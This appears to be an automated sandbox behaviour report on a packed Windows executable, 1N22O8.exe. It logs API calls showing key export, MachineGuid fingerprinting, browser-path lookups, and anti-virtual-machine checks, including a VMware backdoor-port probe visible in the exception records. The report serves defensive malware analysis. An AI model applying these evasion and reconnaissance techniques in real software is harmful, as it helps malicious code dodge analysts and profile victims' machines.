WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Criticism(Traditional(Become(Magnet( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'gIHilton' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: HhIBGrowth console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Match(Cycling(Problem(Efficiency( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'HhIBGrowth' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 96 events)

Time & API	Arguments	Status	Return
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000224990 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501070 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501070 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501070 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5010e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5010e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5013f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5013f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5013f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5013f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000224ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000224ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000224ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5011c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5014d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5014d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5014d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501b60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501b60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002068d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002068d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000206a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000206a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000206a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501c40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501c40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501cb0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b501cb0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b528f00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b528f00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b529280 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b529280 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002247d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002247d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002247d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002247d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0082d198 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0082d198 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0082d258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 8, 2025, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0082d118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayVersion
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 8, 2025, 12:08 p.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 801 events)

Time & API	Arguments	Status
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: 1n22o8+0x31c0b9 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 3260601 exception.address: 0x52c0b9 registers.esp: 2162052 registers.edi: 0 registers.eax: 1 registers.ebp: 2162068 registers.edx: 7143424 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 e9 1d 03 00 00 53 exception.symbol: 1n22o8+0x70fca exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 462794 exception.address: 0x280fca registers.esp: 2162020 registers.edi: 1971192040 registers.eax: 25415 registers.ebp: 3992645652 registers.edx: 2627868 registers.ebx: 2162688 registers.esi: 2298801283 registers.ecx: 0	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 81 e9 81 1b 75 35 83 ec 04 e9 4a 01 00 00 8b exception.symbol: 1n22o8+0x71baf exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 465839 exception.address: 0x281baf registers.esp: 2162016 registers.edi: 1971192040 registers.eax: 29269 registers.ebp: 3992645652 registers.edx: 606929213 registers.ebx: 2162688 registers.esi: 2298801283 registers.ecx: 2628341	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 93 01 00 00 52 89 34 24 89 e6 81 c6 04 00 exception.symbol: 1n22o8+0x71c00 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 465920 exception.address: 0x281c00 registers.esp: 2162020 registers.edi: 1971192040 registers.eax: 29269 registers.ebp: 3992645652 registers.edx: 606929213 registers.ebx: 2162688 registers.esi: 2298801283 registers.ecx: 2657610	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 da 01 00 00 ff 34 24 5a 83 c4 04 exception.symbol: 1n22o8+0x72354 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 467796 exception.address: 0x282354 registers.esp: 2162020 registers.edi: 1971192040 registers.eax: 0 registers.ebp: 3992645652 registers.edx: 606929213 registers.ebx: 239849 registers.esi: 2298801283 registers.ecx: 2631094	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 52 50 b8 f5 24 1f 38 89 44 24 04 e9 96 00 00 exception.symbol: 1n22o8+0x1ed330 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2020144 exception.address: 0x3fd330 registers.esp: 2162020 registers.edi: 4294944348 registers.eax: 370409 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 4208387 registers.esi: 4166128 registers.ecx: 671	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 56 89 0c 24 c7 04 24 e0 c1 b0 5f 52 ba d9 fe exception.symbol: 1n22o8+0x1efedd exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2031325 exception.address: 0x3ffedd registers.esp: 2162020 registers.edi: 21446 registers.eax: 4222776 registers.ebp: 3992645652 registers.edx: 143 registers.ebx: 4190518 registers.esi: 4294964407 registers.ecx: 60622	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 34 24 e9 2a ff ff ff 5a exception.symbol: 1n22o8+0x1f03ec exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2032620 exception.address: 0x4003ec registers.esp: 2162020 registers.edi: 202985 registers.eax: 4222776 registers.ebp: 3992645652 registers.edx: 143 registers.ebx: 4190518 registers.esi: 4294941156 registers.ecx: 60622	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 50 55 bd e9 83 fe 2f b8 f6 00 ad ab 29 e8 5d exception.symbol: 1n22o8+0x1f5182 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2052482 exception.address: 0x405182 registers.esp: 2162020 registers.edi: 10498088 registers.eax: 32295 registers.ebp: 3992645652 registers.edx: 1259 registers.ebx: 4246654 registers.esi: 4294937788 registers.ecx: 14288	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 56 54 e9 78 09 00 00 bb exception.symbol: 1n22o8+0x1faff4 exception.instruction: in eax, dx exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2076660 exception.address: 0x40aff4 registers.esp: 2162012 registers.edi: 10498088 registers.eax: 1447909480 registers.ebp: 3992645652 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 4229001 registers.ecx: 20	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: 1n22o8+0x1fd024 exception.address: 0x40d024 exception.module: 1N22O8.exe exception.exception_code: 0xc000001d exception.offset: 2084900 registers.esp: 2162012 registers.edi: 10498088 registers.eax: 1 registers.ebp: 3992645652 registers.edx: 22104 registers.ebx: 0 registers.esi: 4229001 registers.ecx: 20	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 1b 37 2d 12 01 exception.symbol: 1n22o8+0x1fc965 exception.instruction: in eax, dx exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2083173 exception.address: 0x40c965 registers.esp: 2162012 registers.edi: 10498088 registers.eax: 1447909480 registers.ebp: 3992645652 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 4229001 registers.ecx: 10	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 66 be 05 ce f8 81 d6 df fa 4f 23 fc exception.symbol: 1n22o8+0x20114a exception.instruction: int 1 exception.module: 1N22O8.exe exception.exception_code: 0xc0000005 exception.offset: 2101578 exception.address: 0x41114a registers.esp: 2161980 registers.edi: 0 registers.eax: 2161980 registers.ebp: 3992645652 registers.edx: 1392640048 registers.ebx: 4264522 registers.esi: 274642072 registers.ecx: 12328	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 57 e9 21 fb ff ff 35 c0 a2 92 a2 05 78 b7 7f exception.symbol: 1n22o8+0x201ecb exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2105035 exception.address: 0x411ecb registers.esp: 2162020 registers.edi: 4268854 registers.eax: 6379 registers.ebp: 3992645652 registers.edx: 1713885419 registers.ebx: 0 registers.esi: 10 registers.ecx: 1404960768	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 68 00 67 77 2f e9 c3 05 00 00 68 51 0e 77 15 exception.symbol: 1n22o8+0x210d7b exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2166139 exception.address: 0x420d7b registers.esp: 2162016 registers.edi: 2620066 registers.eax: 30915 registers.ebp: 3992645652 registers.edx: 6 registers.ebx: 25315905 registers.esi: 1971262480 registers.ecx: 4327986	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 9d 00 00 00 50 54 e9 ee 03 00 00 ba 81 a0 exception.symbol: 1n22o8+0x210cae exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2165934 exception.address: 0x420cae registers.esp: 2162020 registers.edi: 2620066 registers.eax: 30915 registers.ebp: 3992645652 registers.edx: 0 registers.ebx: 25315905 registers.esi: 262633 registers.ecx: 4330353	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 68 35 57 6c 61 89 34 24 57 e9 54 00 00 00 33 exception.symbol: 1n22o8+0x214278 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2179704 exception.address: 0x424278 registers.esp: 2162008 registers.edi: 2620066 registers.eax: 26301 registers.ebp: 3992645652 registers.edx: 4340121 registers.ebx: 25315905 registers.esi: 262633 registers.ecx: 310702058	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 27 04 00 00 4b c1 eb 04 81 c3 e3 3b 4e 48 exception.symbol: 1n22o8+0x213e92 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2178706 exception.address: 0x423e92 registers.esp: 2162012 registers.edi: 2620066 registers.eax: 16247125 registers.ebp: 3992645652 registers.edx: 4342978 registers.ebx: 0 registers.esi: 262633 registers.ecx: 310702058	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 51 b9 00 5a 1f 1f e9 01 fe ff ff 31 ea 5d 89 exception.symbol: 1n22o8+0x214be2 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2182114 exception.address: 0x424be2 registers.esp: 2162008 registers.edi: 2620066 registers.eax: 26071 registers.ebp: 3992645652 registers.edx: 4342978 registers.ebx: 4343419 registers.esi: 262633 registers.ecx: 1267618368	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 89 0c 24 c7 04 24 exception.symbol: 1n22o8+0x214cf8 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2182392 exception.address: 0x424cf8 registers.esp: 2162012 registers.edi: 2620066 registers.eax: 26071 registers.ebp: 3992645652 registers.edx: 4342978 registers.ebx: 4369490 registers.esi: 262633 registers.ecx: 1267618368	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 89 00 00 00 81 ed b2 ef a7 7e 5a 81 f5 ab exception.symbol: 1n22o8+0x214f51 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2182993 exception.address: 0x424f51 registers.esp: 2162012 registers.edi: 19327318 registers.eax: 26071 registers.ebp: 3992645652 registers.edx: 0 registers.ebx: 4346542 registers.esi: 262633 registers.ecx: 1267618368	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 29 db e9 50 01 00 00 89 e0 05 04 00 00 00 51 exception.symbol: 1n22o8+0x218f75 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2199413 exception.address: 0x428f75 registers.esp: 2162012 registers.edi: 19327318 registers.eax: 25865 registers.ebp: 3992645652 registers.edx: 1511044083 registers.ebx: 298968385 registers.esi: 262633 registers.ecx: 4387028	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb ba 1d 75 ff 5d 4a 81 ea 23 9f ff 7b f7 d2 81 exception.symbol: 1n22o8+0x2193bc exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2200508 exception.address: 0x4293bc registers.esp: 2162012 registers.edi: 19327318 registers.eax: 1035461480 registers.ebp: 3992645652 registers.edx: 1511044083 registers.ebx: 4294944172 registers.esi: 262633 registers.ecx: 4387028	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 52 ba 00 c5 a5 7b 01 d0 5a 05 8c 2e ed 5f 2d exception.symbol: 1n22o8+0x225e18 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2252312 exception.address: 0x435e18 registers.esp: 2162008 registers.edi: 0 registers.eax: 4414530 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 4410845 registers.esi: 3696419818 registers.ecx: 1404960768	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 e4 00 00 00 53 89 3c 24 bf 00 c8 4b 3b 52 exception.symbol: 1n22o8+0x2264dc exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2254044 exception.address: 0x4364dc registers.esp: 2162012 registers.edi: 0 registers.eax: 4444017 registers.ebp: 3992645652 registers.edx: 116969 registers.ebx: 4410845 registers.esi: 4294940440 registers.ecx: 1404960768	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 57 89 14 24 81 ec 04 00 00 00 e9 75 00 00 00 exception.symbol: 1n22o8+0x2382b4 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2327220 exception.address: 0x4482b4 registers.esp: 2161976 registers.edi: 4488751 registers.eax: 26346 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 1967148821 registers.esi: 4482987 registers.ecx: 1404960768	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 52 51 68 87 b5 0c 0b e9 68 03 00 00 51 e9 31 exception.symbol: 1n22o8+0x238522 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2327842 exception.address: 0x448522 registers.esp: 2161980 registers.edi: 4515097 registers.eax: 26346 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 1967148821 registers.esi: 4482987 registers.ecx: 1404960768	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb ba 36 00 66 10 68 91 c6 b4 1e e9 24 01 00 00 exception.symbol: 1n22o8+0x2384cd exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2327757 exception.address: 0x4484cd registers.esp: 2161980 registers.edi: 4491461 registers.eax: 0 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 1967148821 registers.esi: 4482987 registers.ecx: 322689	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 57 56 68 50 92 67 6b e9 3e 00 00 00 5c e9 ff exception.symbol: 1n22o8+0x2395ad exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2332077 exception.address: 0x4495ad registers.esp: 2161976 registers.edi: 4491461 registers.eax: 26962 registers.ebp: 3992645652 registers.edx: 275120182 registers.ebx: 4491891 registers.esi: 4482987 registers.ecx: 1350198622	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 34 24 e9 35 00 00 00 5c 81 ea 8c exception.symbol: 1n22o8+0x2396b2 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2332338 exception.address: 0x4496b2 registers.esp: 2161980 registers.edi: 4491461 registers.eax: 26962 registers.ebp: 3992645652 registers.edx: 275120182 registers.ebx: 4518853 registers.esi: 4482987 registers.ecx: 1350198622	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 68 f2 3a c2 59 89 34 24 be 18 ab db 6f 50 b8 exception.symbol: 1n22o8+0x238b78 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2329464 exception.address: 0x448b78 registers.esp: 2161980 registers.edi: 4491461 registers.eax: 1392536160 registers.ebp: 3992645652 registers.edx: 275120182 registers.ebx: 4518853 registers.esi: 4294943744 registers.ecx: 1350198622	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 58 02 00 00 81 c4 04 00 00 00 55 bd 04 00 exception.symbol: 1n22o8+0x23a6bc exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2336444 exception.address: 0x44a6bc registers.esp: 2161976 registers.edi: 4496519 registers.eax: 29421 registers.ebp: 3992645652 registers.edx: 291860533 registers.ebx: 1144426420 registers.esi: 4495330 registers.ecx: 0	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 50 89 3c 24 e9 46 fe ff ff 8b 04 24 83 c4 04 exception.symbol: 1n22o8+0x239ffa exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2334714 exception.address: 0x449ffa registers.esp: 2161980 registers.edi: 4525940 registers.eax: 29421 registers.ebp: 3992645652 registers.edx: 291860533 registers.ebx: 1144426420 registers.esi: 4495330 registers.ecx: 0	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 52 51 b9 58 ff 9d 71 89 ca e9 83 fb ff ff 29 exception.symbol: 1n22o8+0x23a140 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2335040 exception.address: 0x44a140 registers.esp: 2161980 registers.edi: 4525940 registers.eax: 4294941444 registers.ebp: 3992645652 registers.edx: 291860533 registers.ebx: 1144426420 registers.esi: 4495330 registers.ecx: 604292950	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 57 89 0c 24 54 59 56 89 e6 81 c6 04 00 00 00 exception.symbol: 1n22o8+0x23b2a1 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2339489 exception.address: 0x44b2a1 registers.esp: 2161980 registers.edi: 4525940 registers.eax: 4528027 registers.ebp: 3992645652 registers.edx: 44777 registers.ebx: 812742001 registers.esi: 4495330 registers.ecx: 4294942744	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 52 89 3c 24 e9 75 00 00 00 5c 89 3c 24 89 0c exception.symbol: 1n22o8+0x241846 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2365510 exception.address: 0x451846 registers.esp: 2161976 registers.edi: 4525940 registers.eax: 32466 registers.ebp: 3992645652 registers.edx: 4526023 registers.ebx: 2631315 registers.esi: 4495330 registers.ecx: 1969225870	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 55 c7 04 24 82 7e 92 33 89 34 24 53 e9 5a 01 exception.symbol: 1n22o8+0x241400 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2364416 exception.address: 0x451400 registers.esp: 2161980 registers.edi: 4294937880 registers.eax: 32466 registers.ebp: 3992645652 registers.edx: 4558489 registers.ebx: 2631315 registers.esi: 573479528 registers.ecx: 1969225870	1
